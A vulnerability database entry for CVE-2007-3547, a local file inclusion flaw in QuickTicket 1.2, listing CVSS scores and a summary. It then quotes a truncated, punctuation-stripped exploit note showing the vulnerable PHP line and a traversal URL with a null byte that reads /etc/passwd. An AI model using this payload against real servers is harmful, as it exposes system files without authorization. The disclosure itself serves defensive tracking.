7.8
CVSSv2

CVE-2007-3547

Published: 03/07/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in qti_checkname.php in QuickTicket 1.2 allows remote malicious users to include and execute arbitrary local files a .. (dot dot) in the lang parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

qt-cute quickticket 1.2

Exploits

###QuickTicket v12 Local File Inclusion### #download: wwwqt-cuteorg/download/qti12zip #found by: katatafish (karatatata@hushcom) #vulncode: $strLang = $_GET["lang"]; include("language/$strLang/qtf_lang_reginc"); #exploit: wwwsitecom/[path]/qti_checknamephp?lang=///////////etc/passwd%00 #thanks:str ...